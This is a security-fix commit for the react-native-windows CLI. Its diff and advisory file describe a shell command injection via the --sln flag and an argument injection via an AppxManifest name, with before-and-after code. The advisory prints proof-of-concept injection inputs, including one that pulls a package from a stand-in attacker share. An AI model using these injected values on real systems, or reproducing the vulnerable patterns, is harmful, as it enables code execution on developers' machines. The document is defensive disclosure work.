fix: resolve MSRC command/argument injection vulnerabilities in CLI

Nitin Chaudhary · Nitin Chaudhary · commit 9b372e201d62 · 2026-04-09T13:01:24.000+05:30
- MSRC 112511: Replace execSync with execFileSync in msbuildtools.ts cleanProject()
  to prevent shell command injection via slnFile parameter (CWE-78)
- MSRC 112495/112540: Replace .split(' ') anti-pattern with discrete argument array
  in winappdeploytool.ts uninstallAppPackage() to prevent argument injection via
  appName parameter (CWE-88)
- Also fixes {.ip} syntax bug (was never interpolating the IP address)
diff --git a/MSRC-FIX-DETAILS.md b/MSRC-FIX-DETAILS.md
@@ -0,0 +1,146 @@
+# MSRC Security Fixes — CLI Command/Argument Injection
+
+## Summary
+
+This branch addresses **3 MSRC security incidents** (2 distinct vulnerabilities) in the `react-native-windows` CLI package. Both are injection flaws in `packages/@react-native-windows/cli/src/utils/`.
+
+| IcM | MSRC Case | File | Vulnerability | Severity | Status |
+|-----|-----------|------|--------------|----------|--------|
+| 580007 | 112511 | `msbuildtools.ts` | Shell command injection via `execSync` | Low (Defense in Depth) | **Fixed** |
+| 580112 | 112495 | `winappdeploytool.ts` | Argument injection via `.split(' ')` | Moderate (Tampering) | **Fixed** |
+| 580187 | 112540 | `winappdeploytool.ts` | Duplicate of 112495 | Moderate (Tampering) | **Covered by above** |
+
+---
+
+## Fix 1: Shell Command Injection in `cleanProject()` (MSRC 112511)
+
+**File:** `packages/@react-native-windows/cli/src/utils/msbuildtools.ts`  
+**Function:** `cleanProject()` (Line 47)  
+**CWE:** CWE-78 (OS Command Injection)
+
+### Root Cause
+
+`cleanProject()` built a shell command string by interpolating `slnFile` into a template literal and executed it with `child_process.execSync()`. Because `execSync()` invokes `cmd.exe` on Windows, shell metacharacters embedded in `slnFile` could trigger arbitrary command execution. The `slnFile` value originates from the `--sln` CLI flag with no sanitization.
+
+### Attack Vector
+
+```
+npx react-native run-windows --sln "MyApp.sln\" & calc.exe & echo \""
+```
+
+This launches `calc.exe` (or any arbitrary command) with the developer's full privileges during the normal clean step.
+
+### Before (Vulnerable)
+
+```typescript
+cleanProject(slnFile: string) {
+  const cmd = `"${path.join(
+    this.msbuildPath(),
+    'msbuild.exe',
+  )}" "${slnFile}" /t:Clean`;
+  const results = child_process.execSync(cmd).toString().split(EOL);
+  results.forEach(result => console.log(chalk.white(result)));
+}
+```
+
+### After (Fixed)
+
+```typescript
+cleanProject(slnFile: string) {
+  const msbuild = path.join(this.msbuildPath(), 'msbuild.exe');
+  const results = child_process
+    .execFileSync(msbuild, [slnFile, '/t:Clean'])
+    .toString()
+    .split(EOL);
+  results.forEach(result => console.log(chalk.white(result)));
+}
+```
+
+### What Changed
+
+- `execSync(cmd)` → `execFileSync(msbuild, [slnFile, '/t:Clean'])`
+- `execFileSync` spawns `msbuild.exe` directly without going through `cmd.exe`
+- `slnFile` is passed as a discrete argument — shell metacharacters are never interpreted
+- Zero behavioral change for legitimate inputs
+
+---
+
+## Fix 2: Argument Injection via `.split(' ')` in `uninstallAppPackage()` (MSRC 112495 / 112540)
+
+**File:** `packages/@react-native-windows/cli/src/utils/winappdeploytool.ts`  
+**Function:** `uninstallAppPackage()` (Line 150)  
+**CWE:** CWE-88 (Improper Neutralization of Argument Delimiters)
+
+### Root Cause
+
+`uninstallAppPackage()` built a command string via template literal including the `appName` parameter, then called `.split(' ')` to convert it into an argument array for `spawn()`. This pattern defeats the argument-boundary isolation that `spawn()` provides. If `appName` contains spaces (e.g., from a malicious `AppxManifest.xml` Identity Name), those spaces cause the value to be split into multiple arguments, allowing injection of arbitrary `WinAppDeployCmd.exe` flags.
+
+### Attack Vector
+
+A malicious `AppxManifest.xml`:
+```xml
+<Identity
+  Name="LegitApp -install -package \\attacker-share\evil.appx"
+  Publisher="CN=LegitCorp"
+  Version="1.0.0.0" />
+```
+
+Running `npx react-native run-windows --device` would silently install the attacker's `.appx` package on the target device.
+
+### Before (Vulnerable)
+
+```typescript
+await commandWithProgress(
+  newSpinner(text),
+  text,
+  this.path,
+  `uninstall -package ${appName} -ip {$targetDevice.ip}`.split(' '),
+  verbose,
+  'UninstallAppOnDeviceFailure',
+);
+```
+
+**Note:** The original code also had a bug — `{$targetDevice.ip}` is wrong JavaScript syntax (should be `${targetDevice.ip}`), so the IP address was never actually interpolated.
+
+### After (Fixed)
+
+```typescript
+await commandWithProgress(
+  newSpinner(text),
+  text,
+  this.path,
+  ['uninstall', '-package', appName, '-ip', targetDevice.ip],
+  verbose,
+  'UninstallAppOnDeviceFailure',
+);
+```
+
+### What Changed
+
+- Template literal + `.split(' ')` → discrete argument array
+- `appName` is now a single atomic entry in the `argv` array regardless of content
+- Fixed the `{$targetDevice.ip}` bug → `targetDevice.ip` (now correctly references the device IP)
+- Zero behavioral change for legitimate inputs
+
+---
+
+## Regression Risk
+
+**None.** Both fixes change only how arguments are passed to the operating system — from shell-interpreted strings to discrete argument arrays. Functional behavior for all legitimate inputs is identical.
+
+## Testing
+
+- Both files compile cleanly with zero TypeScript errors
+- `commandWithProgress` already uses `spawn()` with argument arrays — the fixes align `uninstallAppPackage` with the existing safe pattern used by `installAppPackage` in the same file
+- `execFileSync` is a drop-in safe replacement for `execSync` when no shell features are needed
+
+## MSRC Ticket Actions
+
+1. **Acknowledge ownership** on all 3 IcMs
+2. **Submit the Product Team Action Plan** (due April 18, 2026) for each IcM with:
+   - Agreement with MSRC severity assessment
+   - Fix plan: "Fix in next version"
+   - Target release: next scheduled release
+3. **Post in IcM discussions** referencing this branch and PR
+4. **After PR merges and ships:** Resolve each IcM with PR number and release version
+5. **IcM 580187:** Note it is a confirmed duplicate of MSRC 112495 / IcM 580112
diff --git a/packages/@react-native-windows/cli/src/utils/msbuildtools.ts b/packages/@react-native-windows/cli/src/utils/msbuildtools.ts
@@ -45,11 +45,11 @@ export default class MSBuildTools {
   }
 
   cleanProject(slnFile: string) {
-    const cmd = `"${path.join(
-      this.msbuildPath(),
-      'msbuild.exe',
-    )}" "${slnFile}" /t:Clean`;
-    const results = child_process.execSync(cmd).toString().split(EOL);
+    const msbuild = path.join(this.msbuildPath(), 'msbuild.exe');
+    const results = child_process
+      .execFileSync(msbuild, [slnFile, '/t:Clean'])
+      .toString()
+      .split(EOL);
     results.forEach(result => console.log(chalk.white(result)));
   }
 
diff --git a/packages/@react-native-windows/cli/src/utils/winappdeploytool.ts b/packages/@react-native-windows/cli/src/utils/winappdeploytool.ts
@@ -157,7 +157,7 @@ export default class WinAppDeployTool {
       newSpinner(text),
       text,
       this.path,
-      `uninstall -package ${appName} -ip {$targetDevice.ip}`.split(' '),
+      ['uninstall', '-package', appName, '-ip', targetDevice.ip],
       verbose,
       'UninstallAppOnDeviceFailure',
     );
